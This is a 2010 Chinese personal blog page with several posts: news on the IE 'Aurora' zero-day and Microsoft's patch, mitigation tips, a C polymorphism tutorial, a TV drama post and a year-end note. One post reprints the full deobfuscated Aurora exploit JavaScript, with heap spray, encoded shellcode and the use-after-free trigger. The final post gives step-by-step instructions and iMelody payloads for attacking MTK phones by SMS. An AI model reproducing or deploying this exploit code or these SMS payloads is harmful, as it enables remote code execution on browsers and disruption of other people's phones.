Pray's Blog

IE 0day(极光)漏洞微软发布非常规补丁

Pray — Fri, 22 Jan 2010 10:31:01 +0800

　　微软针对黑客用来攻击Google及其它33家公司的IE零日漏洞发布紧急更新。

　　这是微软2010年首次发布非常规补丁，按照常规，微软将于2月份第二周周二发布漏洞补丁。目前针对极光漏洞的病毒疫情十分紧急，短短3天内，极光漏洞已经迅速被国内黑客广泛用于网站挂马，目前已有大约70%的挂马网站利用这一漏洞传播各类恶意软件。微软已向所有MAPP成员发送通知，表示将要发布针对该漏洞的紧急补丁，要求所有成员做好相关安全部署的准备，用户可以通过微软系统自动升级程序以及杀毒软件的漏洞扫描程序修复该漏洞。

　　上周五，法国和德国IT安全组织建议，在漏洞修复之前，IE用户最好换用其他浏览器或者直接弃用IE。澳大利亚官方也有类似的举动。

　　英国sophos杀毒软件公司资深安全顾问格雷厄姆·克卢利说，从业多年来，在他印象中，欧洲国家还没有“这样强烈地发出建议”推荐用户使用其他产品。

　　“极光”漏洞影响的微软操作系统及IE版本如下：

　　Windows 2000 SP4平台：IE 5.01 SP4、IE6 SP1;

　　Windows XP SP2/SP3平台：IE6、IE7、IE8;

　　64位Windows XP专业版SP2平台：IE6、IE7、IE8;

　　32位及64位Windows Vista、Windows Vista SP1/SP2平台：IE7、IE8;

　　32位及64位Windows 7平台：IE8;

　　32位、Itanium及64位Windows Server 2003 SP2平台：IE6、IE7、IE8;

　　32位、Itanium及64位Windows Server 2008、Windows Server 2008 SP2平台：IE7、IE8;

　　Itanium及64位Windows Server 2008 R2平台：IE8。

　　傲游公布了一个模拟利用该漏洞攻击的页面，试试这漏洞对你浏览器有没有危害吧，如果出现本机计算器程序启动或浏览器崩溃，说明您的浏览器会因此漏洞受到木马病毒的攻击，造成您的网游，银行卡等账号被盗丢失。测试地址：http://www.maxthon.cn/test/security.htm

文章地址:http://www.nodll.com/2010/01/22/ie0daybug/Pray.html

IE新0day漏洞临时解决办法

Pray — Tue, 19 Jan 2010 02:34:13 +0800

此0day漏洞存在于IE浏览器，且可导致远程代码执行
研究发现Windows 2000 SP4上(以下省去Windows)的IE 5.1 SP4不受此影响；而以下IE版本（无论是32位还是64位）均受此漏洞影响：
2000 SP4上的 IE6 SP1
XP、Server 2003、Vista、Server 2008、7、Server 2008 R2上的IE6、IE7、IE8

此漏洞存在于IE无效的指针引用。当对象被删除后，在一定的条件下可以访问无效的指针。在针对此漏洞的攻击里试图访问一个已释放的对象时，可引起IE执行远程代码。
当前，微软已知的利用此漏动的攻击影响有限且有针对性，仅针对IE6。微软并未发现利用此漏洞针对其他版本IE的攻击。微软会继续监视漏洞带来的影响并更新安全通报979352。
另外，已发现的利用此漏洞的攻击可以被DEP(Data Execution Prevention，数据执行保护)阻挠。DEP在IE8中是默认启用的；而在IE7中，用户可手动开启DEP。

手动开启IE7中DEP保护的办法：
1.打开“Internet属性”(从控制面板打开；或打开IE，选择“工具”，再选择“Internet属性”)，切换到“高级”选项卡。
2.选中“启用内存保护帮助减少联机攻击”，重启IE7后生效。

或者你也可以使用微软提供的Fix It工具来针对IE6、IE7启用DEP保护
Fix It微软官方下载地址（单击）：http://go.microsoft.com/?linkid=9668626
下载后，按照此工具的向导操作即可。
卸载工具下载地址（单击）：http://go.microsoft.com/?linkid=9668627
360“极光”IE0day漏洞临时补丁：http://dl.360safe.com/360ietagpatch.exe

文章地址:http://www.nodll.com/2010/01/19/ienew0day/Pray.html

极光行动:攻击Google的代码曝光

Pray — Tue, 19 Jan 2010 02:24:32 +0800

TechWeb旗下的DarkReading发表文章，透露iDefense已经收回之前发布的Adobe PDF漏洞导致Google被攻击的声明，承认McAfee所说的IE漏洞才是祸源。

文章还给出了一个链接，指向开源渗透测试工具项目Metasploit的博客，上面给出了利用这个IE漏洞的攻击代码链接。代码如下：

去混淆后的代码

Evals
var n = unescape("%u0c0d%u0c0d");
while (n.length = 524288)n += n;
n = n.substring(0, 524269 - sc.length);
var x = new Array();
for (var i = 0; i 200; i ++ ){
x[i] = n + sc;
}
(repeated 1 time)
Writes
htmlscriptvar sc = unescape("
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805
%uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2
%u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053
%ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8
%ub230%u81d9%u9a30%ud8db%u3ad8%ub021%uebb4%ud8ea%uabb0%ubdb0%u8cb4%u9e53%u30d4%uda69%ud8d8
%u3053%ud9b2%u3081%udbfb%ud8d8%u213a%u3459%ud9d8%ud8d8%u0453%u1b59%ud858%ud8d8%ud8b2%uc2b2
%ub28b%u27d8%u9c8e%u18eb%u5898%udbe4%uadd8%u5121%u485e%ud8d8%u1fd8%udbdc%ub984%ubdf6%u9c1f
%udcdb%ubda0%ud8d8%u11eb%u8989%u8f8b%ueb89%u5318%u989e%u8630%ud8da%u5bd8%ud820%u5dd7%ud9a7
%ud8d8%ud8b2%ud8b2%udbb2%ud8b2%udab2%ud8b0%ud8d8%u8b18%u9e53%u30fc%udae5%ud8d8%u205b%ud727
%u865c%ud8d9%u51d8%ub89e%ud8b2%u2788%uf08e%u9e51%u53bc%u485e%ud8d8%u1fd8%udbdc%uba84%ubdf6
%u9c1f%udcdb%ubda0%ud8d8%ud8b2%ud8b2%udab2%ud8b2%ud8b2%ud8b0%ud8d8%u8b98%u9e53%u30fc%ud923
%ud8d8%u205b%ud727%uc45c%ud8d9%u51d8%u5c5e%ud8d8%u51d8%u5446%ud8d8%u53d8%ub89e%ud8b2%ud8b2
%ud8b2%u9e53%u88b8%u8e27%u1fe0%ua89e%ud8d8%ud8d8%u9e1f%ud8ac%ud8d8%u59d8%ud81f%ud8da%uebd8
%u5303%ubc86%ud8b2%u9e55%u88a8%ud8b0%ud8dc%u8fd8%uae27%u27b8%udc8e%u11eb%ud861%ud8dc%u58d8
%ud7a4%u4d27%ud4ac%ua458%u27d7%uacd8%u58dd%ud7ac%u4d27%u333a%u1b53%ud8f5%ud8dc%u5bd8%ud820
%udba7%u8651%ub2a8%u55d8%uac9e%u2788%ua8ae%u278f%u5c6e%ud8d8%u27d8%ue88e%u3359%udcd8%ud8d8
%u235b%ua7d8%u277d%ub8ae%u8e27%u27ec%u5c6e%ud8d8%u27d8%uec8e%u5e53%ud848%ud8d8%u4653%ud854
%ud8d8%udc1f%u84db%uf6b9%u8bbd%u8e27%u53f4%u5466%ud8d8%u53d8%u485e%ud8d8%u1fd8%udfdc%uba84
%ubdf6%u3459%ud9d8%ud8d8%u0453%ud8b0%ud8d9%u8bd8%ud8b0%ud8d9%u8fd8%ud8b2%ud8b2%u8e27%u53c4
%ueb23%ueb18%u5903%ud834%ud8da%u53d8%u5b14%u8c20%ud0a5%uc451%u5bd9%udc18%u2b33%u1453%u0153
%u1b5b%uebc8%u8818%u8b89%u8888%u8888%u8888%u888f%u5388%ud09e%u2f30%ud8d8%u53d8%ue4a6%uec30
%ud8d9%u30d8%ud8ef%ud8d8%ubbb0%uafae%ub0d8%ub0ab%ub7bc%u538c%ud49e%u6e30%ud8d8%u51d8%ue49e
%u79bc%ud8dc%ud8d8%u7855%u27b8%u2727%ubdb2%uae27%u53e4%uc89e%u4230%ud8d8%uebd8%u8b03%u8b8b
%u278b%u3008%ud83d%ud8d8%u3459%ud9d8%ud8d8%u2453%u1f5b%u1fdc%ueadf%u49ac%u1fd4%udc9f%u51bb
%u9709%u9f1f%u78d0%u4fbd%u1f13%ud49f%u9889%ua762%u9f1f%ue6c8%u6ec5%u1fe1%ucc9f%ub160%uc30c
%u9f1f%u66c0%ubea7%u1f78%uc49f%u7124%u75ef%u9f1f%u40f8%uc8d2%ubc20%ue879%ud8d8%u53d8%ud498
%ua853%u75c4%ub053%u53d0%u512f%ubc8e%udcb2%u3081%ud87b%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0
%ubdab%u8caa%ude53%uca30%ud8d8%u53d8%ub230%u81dd%u5c30%ud8d8%u3ad8%ueb21%u8f27%u8e27%u58dc
%u30e0%ue058%uad31%u59c9%udda0%u4848%u4848%ud0ac%u2753%u538d%u5534%udd98%u3827%ue030%ud8d8
%u1bd8%ue058%u5830%u31e0%uc9ad%ua059%u48dd%u4848%uac48%ub03f%ud2d0%ud8d8%u9855%u27dd%u3038
%ud8cf%ud8d8%u301b%ud8c9%ud8d8%uc960%udcd9%u1a58%ud8d4%uda33%u1b80%u2130%u2727%u8327%udf1e
%u5160%ud987%u1fbe%udd9f%u3827%u8b1b%u0453%ub28b%ub098%uc8d8%ud8d8%u538f%uf89e%u5e30%u2727
%u8027%u891b%u538e%ue4ad%uac53%ua0f6%u2ddb%u538e%uf8ae%u2ddb%u11eb%u9991%udb75%ueb1d%ud703
%uc866%u0ee2%ud0ac%u1319%udbdf%u9802%u2933%uc7e3%u3fad%u5386%ufc86%u05db%u53be%u93d4%u8653
%udbc4%u5305%u53dc%u1ddb%u8673%u1b81%uc230%u2724%u6a27%u3a2a%u6a2c%ud7ee%u28cb%ua390%ueae5
%u49ac%u5dd4%u7707%ubb63%u0951%u8997%u6298%udfa7%ufa4a%uc6a8%ubc7c%u4b37%u3cea%u564c%ud2cb
%ua174%u3ee1%u1c40%uc755%u8fac%ud5be%u9b27%u7466%u4003%uc8d2%u5820%u770e%u2342%ucd8b%ub0be
%uacac%ue2a8%uf7f7%ubdbc%ub7b5%uf6e9%uacbe%ub9a8%ubbbb%uabbd%uf6ab%ubbbb%ubcf7%ub5bd%uf7b7
%ubcb9%ub2f6%ubfa8%u00d8");
var sss = Array(826, 679, 798, 224, 770, 427, 819, 770, 707, 805, 693, 679, 784, 707, 280,
238, 259, 819, 336, 693, 336, 700, 259, 819, 336, 693, 336, 700, 238, 287, 413, 224, 833,
728, 735, 756, 707, 280, 770, 322, 756, 707, 770, 721, 812, 728, 420, 427, 371, 350, 364,
350, 392, 392, 287, 224, 770, 301, 427, 770, 413, 224, 770, 427, 770, 322, 805, 819, 686,
805, 812, 798, 735, 770, 721, 280, 336, 448, 371, 350, 364, 350, 378, 399, 315, 805, 693,
322, 756, 707, 770, 721, 812, 728, 287, 413, 826, 679, 798, 224, 840, 427, 770, 707, 833,
224, 455, 798, 798, 679, 847, 280, 287, 413, 224, 714, 777, 798, 280, 826, 679, 798, 224,
735, 427, 336, 413, 735, 420, 350, 336, 336, 413, 735, 301, 301, 287, 224, 861, 840, 637,
735, 651, 427, 770, 301, 805, 693, 413, 875);
var arr = new Array;
for (var i = 0; i sss.length; i ++ ){
arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString();cc=cc.replace(/ ,/ g, ""
);
cc = cc.replace(/@/g, ",");
eval(cc);
var x1 = new Array();
for (i = 0; i 200; i ++ ){
    x1[i] = document.createElement("COMMENT");
    x1[i].data = "abc";
}
;
var e1 = null;
function ev1(evt){
    e1 = document.createEventObject(evt);
    document.getElementById("sp1").innerHTML = "";
    window.setInterval(ev2, 50);
}
function ev2(){
    p = "
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";
    for (i = 0; i x1.length; i ++ ){
      x1[i].data = p;
    }
    ;
    var t = e1.srcElement;
}
/scriptspan id="sp1"IMG SRC="aaa.gif" xxxxx="ev1(event)"/span/body/html
(repeated 1 time)

微软也发布了对这个漏洞的更新分析，表明Windows XP上的IE 6最为危险。值得一提的是，文章特别感谢了CSDN专家博客暨《程序员》杂志专栏作者、微软中国的褚诚云。
还有专家用视频演示了攻击过程。

《连线》杂志文章给出了大量攻击细节，非常值得一读。

　　文章引述McAfee公司的话，说（攻击Google的）黑客使用了前所未有的战术，组合了加密、隐秘编程技术和IE中的未知漏洞，意图是窃取Google、Adobe和许多其他大公司的源代码。

　　该公司威胁研究副总裁Dmitri Alperovitch说：在国防工业之外，我们从未见过商业行业的公司遭受过如此复杂程度的攻击。

　　Alperovitch说，攻击者使用了十几种恶意代码和多层次的加密，深深地挖掘进了公司网络内部，并巧妙掩盖自己的活动。在掩饰攻击和防范常规侦测方法上，他们的加密非常成功。我们从未见过这种水平的加密。非常高超。

　　McAfee之所以将这种攻击命名为Auroro（极光），是因为他们发现，黑客在将恶意代码编译为可执行文件时，编译器将攻击者机器上的路径名插入代码中。

　　在IE漏洞被曝光后，微软很快发布了针对性的安全建议书。而McAfee也在其产品中增加了侦测这种攻击所用恶意代码的功能。

　　虽然最初的攻击始自公司雇员访问恶意网站，但是研究人员还在试图确定网站的URL是通过邮件、聊天程序还是其他方式，比如Facebook或者其他社会化网站。

　　当用户访问恶意网站的时候，他们的IE浏览器将被袭击，自动而且秘密地下载一系列恶意代码到计算机中。这些代码就像俄罗斯套娃那样，一个跟着一个地下载到系统中。

　　Alperovitch表示，最初的攻击代码是经过三次加密的shell code，用来激活漏洞挖掘程序。然后它执行从外部机器下载的程序，后者也是加密的，而且会从被攻击机器上删除第一个程序。这些加密的二进制文件将自己打包为几个也被加密的可执行文件。

　　其中一个恶意程序会打开一个远程后门，建立一个加密的秘密通道，伪装为一个SSL链接以避免被侦测到。这样攻击者就可以对被攻击机器进行访问，将它作为滩头阵地，继续进攻网络上的其他部分，搜索登录凭据、知识产权和其他要找的东西。

　　McAfee因参与攻击调查，从被攻击公司那里得到了攻击所用的一些恶意代码副本，并在几天前加强了自己的产品。

　　对于另一家安全企业iDefense之前所说的有些攻击使用了Trojan.Hydraq木马，Alperovitch表示，他发现的恶意代码此前任何反病毒厂商都不知道。

　　iDefense还说攻击者使用了恶意PDF附件和Adobe PDF程序的漏洞，而Alperovitch说，他调查的公司里没有发现这种情况。但他表示攻击不同公司的方法可能不同，不限于IE漏洞。

　　当黑客进入系统后，他们将数据发送给位于美国伊利诺依州和得克萨斯州以及中国台湾的指挥控制服务器。Alperovitch所没有识别到美国的系统牵涉到这次攻击，也没有提到攻击者的战果。但Rackspace报告他们无意中在攻击中发挥了少量作用。而iDefense则表示攻击者的目标是许多公司的源码库，而且很多情况下都成功得手。

　　Alperovitch说攻击看上去是从12月15日开始的，但也有可能更早。似乎结束于1月4日，那一天，用来与恶意代码传输数据的指挥控制服务器被关闭。

　　他说：我们不知道服务器是由攻击者关闭的，还是其他组织关闭的。但是从那时起，攻击停止了。

　　Aperovitch还指出，攻击的时机非常好，是在假日期间，公司的运营中心和安全响应团队人手很少。攻击的复杂程度令人印象深刻，是那种此前仅针对国防工业的攻击类型。一般对于商业部门，攻击只是为了获取财务方面的信息，通常是通过SQL注入攻击公司的网站，或者攻击公司不安全的无线网络。网络罪犯一般不会花大量的时间把攻击精雕细刻到如此程度，每个方面都采取混淆/加密防范。

　　McAfee还掌握了更多攻击细节，但目前不准备公布。他们已经与美国执法部门合作，并将这一问题告知美国各级政府。

　　对于Google可能退出中国声明中提到的此前所受到的攻击，安全技术界给出了各种解释。

　　VeriSign公司的iDefens实验室的安全分析师发布了一份媒体公告，称黑客攻击了主要的源代码库。

　　VeriSign说超过30家技术公司遭到了一系列攻击，这有可能始于七月份的一种类型相近的攻击，这一攻击通过包含恶意PDF文件的电子邮件信息攻击了100个IT公司。金融和防御机构也有可能遭到了攻击。

　　VeriSign iDefense在其公告中称：据熟悉这种攻击的人员透漏，攻击者采取了传播针对Google的恶意代码的方式和使用PDF作为电邮附件的攻击方式；这些文件的特征和去年7月份一次攻击的特征很相似。这两起攻击中，恶意文件都在Windows DLL中安插了一个后门木马。

　　VeriSign说这两起攻击使用了相似的IP地址，并使用了相同的命令和控制结构。这些IP地址都属于Linode（一家美国的虚拟私有服务器主机供应商）所有。

　　VeriSign说：考虑到它们是如此接近，有可能这两种攻击就是同一种攻击。那些遭到硅谷攻击的组织自七月以来就一直处于威胁之中。

　　类似的分析在《MIT技术评论》的这篇文章中有比较全面的介绍。

　　而McAfee CTO George Kurtz（也是《黑客大曝光》一书的作者之一）则明确不同意这种观点，他在博客中称，Google所受攻击应该源于一种新的此前不大为人所知的IE漏洞。McAfee已经向微软通报了此漏洞，预计不久微软将提供相关建议。他表示，攻击主要针对某些能够访问重要知识产权的特定人员，攻击者向他们发送像是来自一个信任来源的链接或者附件，诱使目标点击，不知不觉中下载和安装恶意软件，为攻击者打开后门，进入所属公司的网络。

　　Kurtz将这种攻击命名为Aurora（极光）。他在文中还说到，安全威胁已经进入了一个新时代，类似的攻击只是冰山之一角。与之前常见的影响广泛的病毒如红色代码不同，这种攻击需要复杂而精巧的社交工程配合，一般目标极为明确，往往指向有利可图或者机密的知识产权。

　　【更新】

　　微软已经在自己的网站发布了一个关于Kurtz所述IE漏洞的安全建议，其中指出，漏洞是IE中的一个无效指针引用。在一些情况下，这个指针可能在对象删除之后仍然能够访问。在精心设计的攻击中，通过试图访问已被释放的对象，IE可以被用来允许远程代码的执行。

　　微软表示，该漏洞将影响Windows各版本上的IE 6到IE 8浏览器。只有较老的IE 5.01 SP4不受影响。如果怀疑自己的电脑已经受到这一漏洞的影响，可以访问https://consumersecuritysupport.microsoft.com/default.aspx?mkt=en-usscrx=1。

　　微软公司已经承诺尽快推出补丁。

　　McAfee的威胁研究副总裁Dmitri Alperovitch表示，这种攻击非常复杂，此前往往针对的是政府和国防部门，应该不是业余者所为。McAfee之所以将这种攻击称为Aurora（极光），是因为该恶意代码的二进制文件路径名是这个单词。相信这是攻击者自己为这种攻击所起的名字。

　　另据IOActive公司渗透测试总监Dan Kaminsky说，Windows XP及以上版本的DEP（数据执行保护）功能有助于防范此类攻击。另外，虽然Google所受攻击用到的恶意代码只影响IE 6，但这个漏洞仍然可以用来攻击更高版本。不过，Windows Vista和Windows 7采用了ASLR（地址空间布局随机化，address space layout randomization）的保护技术，大大增加了攻击的难度。

　　【1月15日20:17更新】

　　《华尔街日报》文章说：据了解（对Google）攻击的知情人士透露，黑客试图通过六个台湾的网络地址来掩饰自己的身份，这是中国大陆黑客的惯常策略。

　　六个地址中，有五个为提供网络电视电影的年代数位媒体股份有限公司(Era Digital Media Co.)所有。该公司表示对攻击并不知情，并拒绝发表更多评论。第六个地址为金融软件提供商奇唯科技股份有限公司所有。奇唯表示，已于6月份弃用相关地址。

　　台湾内政部警政署科技犯罪防制中心主任李相臣表示，两家公司本身可能都是受害者。

　　【1月16日5:15更新】

　　读写网报道，在影响Google安全的IE漏洞曝光后，德国政府呼吁不要使用微软的浏览器。因为其他黑客也会利用这一漏洞。

　　纽约时报报道，Google受到的攻击可能牵涉到的其他著名公司又增加了国防工业的Northrop Grumman和知名安全厂商Symantec。

文章地址:http://www.nodll.com/2010/01/19/hackergoogle/Pray.html

如何用C语言实现C++的多态的编程技巧

Pray — Fri, 15 Jan 2010 16:13:24 +0800

　　我们先用下面的结构来描述一个对象：

　typedef struct _ClassType 
　　{ 
　　char* name; /*对象名，唯一*/ 
　　int object_size;/*对象大小，创建实列时分配内存要用到*/ 
　　int class_size; /*全部虚函数大小，如sizeof(CObjectClass)*/ 
　　void* vclass; /*虚函数指针*/ 
　　void (*InitClassCallback)(void*); /*给对象的虚函数赋值*/ 
　　void (*InitObjectCallback)(void*);/*对象实例化时，给实例成员赋初值，有点类似构造函数*/ 
　　struct _ClassType* parent; /*父对象*/ 
　　struct _ClassType* next; /*单向链表，指向下一对象*/ 
　　}ClassType; 
　　#define [MAX_CLASS_NUM 128 
　　static ClassType classes[MAX_CLASS_NUM]; /*对象池*/ 
　　static ClassType *used_classes = NULL; 
　　static ClassType *free_classes = NULL;

　　这里只定义了128个对象，数目可能修改或者改成动态分配。
　　初始化，全部链接到空闲链表中

　void InitObjectLib(void) 
　　{ 
　　int i; 
　　memset(classes, 0, sizeof(ClassType)*MAX_CLASS_NUM); 
　　for( i=0;i  
　　{ 
　　classes[i].next = &(classes[i+1]); 
　　} 
　　free_classes = &(classes[0]); 
　　}

　　这个函数既是获取对象的虚函数指针，也是注册对象。
　　这里要注意type为static，一个对象只注册一次，下次获取时直接取type。
　　RegisterClassType()第一个参数为对象的描述信息，第二个参数为父对象的函数指针，我们来看一下它的定义：

1 2	#define TOP_OBJECT_TYPE 0 　　#define BASE_OBJECT_TYPE GetObjectType()

　　因为CObject为基对象，它没有父对象，所以这里第二个参数为0(TOP_OBJECT_TYPE)。
　　现在假设有一个CObject子对象CSubObject，那么注册它时应该这样写：

1	type = RegisterClassType(&classinfo, BASE_OBJECT_TYPE);

　　由此可能看到，这里其实是一个递归：当注册CSubOject里会用到参数BASE_OBJECT_TYPE，既GetObjectType()，这样就可以把CObject也注册上。
　　简单的说：如果C继承于B，B继承于A，现在假设A、B还未注册，当注册C时，通过递归也能把B、A注册上。

　　int GetObjectType(void) 
　　{ 
　　static int type = 0; 
　　if( type==0 ) 
　　{ 
　　static ClassInfo classinfo = 
　　{ 
　　"OBJECT", /*对象名，唯一*/ 
　　sizeof(CObject), 
　　sizeof(CObjectClass), 
　　(pInitObjectCallback)InitObject, 
　　(pInitClassCallback)InitObjectClass, 
　　}; 
　　type = RegisterClassType(&classinfo, TOP_OBJECT_TYPE); 
　　} 
　　return type; 
　　}

　　我们再来看一看InitObject和InitObjectClass

　static void InitObjectClass(CObjectClass *vclass) 
　　{ 
　　if(vclass==NULL) 
　　return; 
　　vclass->destory = DestoryObject;/*对虚函数赋值*/ 
　　} 
　　static void InitObject(CObject *object) 
　　{ 
　　if(object==NULL) 
　　return; 
　　object->ref_counter = 1; 
　　}

　　这两个函数在GetObjectType()被传进去，那么又是在哪儿被调用的?
让我们看RegisterClassType()

　int RegisterClassType(ClassInfo *classinfo, int parent_type) 
　　{ 
　　int type = 0; 
　　ClassDesc *current, *parent; 
　　parent = (ClassType *)parent_type; 
　　if( classinfo->name==NULL ) 
　　{ 
　　TRACE("RegisterClassType(): class name is NULL\n"); 
　　return type; 
　　} 
　　/*检查是否有对象名重复*/ 
　　current = used_classes; 
　　while(current) 
　　{ 
　　if(strcmp(current->name, classinfo->name)==0 ) 
　　{ 
　　TRACE("RegisterClassType(): class name is redefined\n"); 
　　unlock(); 
　　return type; 
　　} 
　　current = current->next; 
　　} 
　　/*创建对象*/ 
　　current = free_classes; 
　　if(current) 
　　{ 
　　free_classes = free_classes->next; 
　　current->name = classinfo->name; 
　　current->parent = parent; 
　　current->class_size = classinfo->class_size; 
　　current->InitClassCallback = classinfo->InitClassCallback; 
　　current->InitObjectCallback = classinfo->InitObjectCallback; 
　　current->vclass = malloc(current->class_size); 
　　if( current->vclass==NULL ) 
　　{ 
　　TRACE("RegisterClassType(): malloc vclass failed\n"); 
　　} 
　　memset( current->vclass, 0, current->class_size); 
　　current->vclass->class_type = (int)current; 
　　if( parent )/*子对象的虚函数全部指向父对象的虚函数*/ 
　　{ 
　　memcpy(current->vclass, parent->vclass, parent->class_size); 
　　}

　　对子对象新添加的虚函数赋值，也可以对继承于父对象的虚函数重赋值。

1 2	if( current->InitClassCallback ) 　　current->InitClassCallback(current->vclass);

　　链接到对象池中

　current->next = used_classes; 
　　used_classes = current; 
　　} 
　　else 
　　{ 
　　TRACE("RegisterClassType(): ERROR, no class in class pool\n"); 
　　} 
　　type = (int)current; 注意：type为ClassType类型的指针。 
　　return type; 
　　}

　　创建对象的实例

　CObject *NewObject(void) /*创建一个实例*/ 
　　{ 
　　return NewClassType(BASE_OBJECT_TYPE); 
　　} 
　　void *NewClassType(int class_type) 
　　{ 
　　ClassType *pclass = NULL; 
　　void *object = NULL; 
　　if( pclass==0 ) 
　　return NULL; 
　　pclass = (ClassType*)class_type; 
　　/*为实例分配内存空间*/ 
　　object = (CObject*)malloc(pclass->object_size); 
　　if( object ) 
　　{ 
　　/*实例的虚函数指针指向它的对象的虚函数指针*/ 
　　((CObject*)object)->vclass = pclass->vclass; 
　　/*调用父对象的初始化函数，这个函数是递归函数， 
　　先初始化基对象，再初始化子对象，再初始化子子对象...*/ 
　　InitParentObject(pclass, object); 
　　} 
　　return object; 
　　} 
　　static void InitParentObject(ClassType *current, void *object) 
　　{ 
　　if( current ) 
　　{ 
　　if( current->parent ) 
　　InitParentObject(current->parent, object); 
　　if( current->InitObjectCallback ) 
　　current->InitObjectCallback(object); 
　　} 
　　}

文章地址:http://www.nodll.com/2010/01/15/about-c-c/Pray.html

胡歌版（神话）全集在线观看

Pray — Wed, 06 Jan 2010 13:49:32 +0800

　　这几天迷上一部电视剧(神话)，每天更新3集，但胡歌主演，还是坚持在看，他演的古装片我都挺喜欢，部分凄美的爱情，英雄的传奇，历史史诗为一身，还真羡慕这些角色。

主要演员：

　　胡歌——易小川 / 蒙毅
　　白冰——玉漱公主
　　张世——高要 / 赵高
　　张萌——高岚 / 虞姬 / 小月
　　任泉——易大川
　　谭凯——项羽
　　金莎——吕素
　　张卫——高渐离
　　一真——金将军
　　陈紫函——吕雉
　　丁子峻——蒙恬
　　李易祥——刘邦

剧情介绍:

　　一段跨越千年的爱情一个男人的成长历程
　　从轻狂不羁的现代少年到指挥千军万马的将军
　　当穿越时空遇到真爱责任与爱情却不能两全
　　相爱是否还能相守他和她将如何选择
　　易小川和易大川是一对孪生兄弟，偶然间发现的一个神秘盒子把小川传送到了2000年前的秦国，而大川却留在了现代。
　　小川在秦国经历了种种离奇而又惊心动魄的冒险，和项羽、刘邦结拜为了兄弟，遇见秦始皇，并参加了起义军。
　　当然小川也遇到了自己的爱情——玉洁冰清的玉漱公主，然而俩人却因为种种原因不能相守。一向玩世不恭的小川在2000年前的古老王朝中不断的成长起来，并且开始体会到责任和爱的真谛。
　　另一边，身处现代世界的大川，不断地与神秘黑衣人斗争，并从古迹中追寻着小川的痕迹，在这个过程中他也收获了自己的爱情。
　　兄弟两个最终能否团聚？小川的出现是否能改变历史的进程？让(神话)给您揭晓谜底吧……

帮他在卖广告- -:

　　说说他演的古装片，也是我喜欢的。(射雕英雄传)，很痴的郭靖，很纯的郭靖，电视剧上的插曲<我只能爱你>歌词写的很美。(少年杨家将)这部电视剧胡歌演的六郎有层次性，由浅入深，越來越丰富，看到后来会为他的成长而感动。(天外飞仙)上的董永，一样是痴，善良，一心追求着小七。(聊斋)的宁采臣，还是痴吧，为了小倩，不管做人还是做妖。游戏改编的(仙剑奇侠传)，李逍遥，游戏上的他很搞笑，却也很感动，虽然很多诗词电视剧上没有，各有各的感动之处。(仙剑奇侠传三)游戏上的景天并没有电视剧上的那样调皮，称呼长卿为大哥，可能李国立导演为了在伤感之处加些幽默，仙三电视剧上出现的高科技挺多的，类似GPS之类的设备让主角们的寻人效率飞速提高，点柱香就能实现视频对话，蜀山人手一个的通讯仪器能让他们随时保持联系，功能媲美现代最先进的手机……而融入现代、古代的(神话)里面的他，还是期待中。

在线高清观看地址:

土豆网　　搜狐网　　迅雷看看　　腾讯网　　乐乐看50全集

文章地址:http://www.nodll.com/2010/01/06/shenhua/Pray.html

写在09年的最后一天

Pray — Thu, 31 Dec 2009 13:30:50 +0800

　　写在09年的最后一天，以纪念，即将逝去的一年。或者说，这是一种自我安慰，想挽留着这一年的时光。

　　09年最后一天里，在家乡度过的，阴沉沉的天，冷冷的天气，见不到阳光的微笑。今天适合坐在家里，看看书，回忆些09年的往事，可脑子不听使唤，回忆总是绕着代码那里徘徊。

　　今天的流走，时光的飞逝，大家在这一年收获的不少东西吧。

　　不知道为什么，感觉09年的过去，并不单单代表着一年的过去，而是十年。就像上世纪的八十年代、九十年代，都是以十年为单位的，所以说，进入2010，一个崭新的年代。而我们这个年代又要试着跟进新年代的生活。

　　从小父亲就教我写作文，而今天，写的特别少，在这个月、这一年、这个年代的最后一天，祝大家新年快乐。

文章地址:http://www.nodll.com/2009/12/31/09time/Pray.html

MTK方案4种手机短信漏洞

Pray — Mon, 21 Dec 2009 09:23:13 +0800

影响手机品牌：所有MTK方案手机（也就是我们常说的山寨手机）
且写短信时有【“选项”——“插入对象”——“我的铃声”】这一功能（大部分山寨手机都有此功能）

漏洞原理：
在大部分MTK方案手机中，编写短信息的时候可以插入一种“imy”格式的铃声文件，
而具有同样功能的手机接收到此短信后在查看信息内容的同时可以听到短信息内插入的铃声
由于MTK方案手机在阅读短信息的时候对“imy”文件内容不经过过滤而直接执行。
所以我们可以在“imy”文件内插入代码，通过代码调用手机的解码芯片发出一些声音甚至一些核心指令。
通过这种方式可实现对MTK方案手机的短信攻击。

操作方式：
在电脑上新建文本文档，写入代码，保存为“imy”格式文件。
将这个文件放入手机的“Audio”文件夹内。（注意，一定是手机的“Audio”文件夹，而非内存卡上。）
用手机编辑短信，“选项”——“插入对象”——“我的铃声”，选择你写的“imy”文件。
完成，发送…

黑屏代码：

BEGIN:IMELODY
BEAT:1200
MELODY:(ledoffbackoffvibeoffr5ledoffbackoffvibeoffr5@600)
END:IMELODY

猛震代码：

BEGIN:IMELODY
VERSION:1.2
FORMAT:CLASS1.0
BEAT:100
MELODY:(ledoffledonbackoffbackonvibeon@300)
END:IMELODY

振铃代码：

BEGIN:IMELODY
VERSION:1.2
FORMAT:CLASS1.0
BEAT:200
MELODY:(ledoffbackoffvibeonr5vibeoffledonbackonr5@200)
END:IMELODY

格式化代码：（请慎用）

BEGIN:IMELODY
VERSION:1.2
FORMAT:CLASS1.0
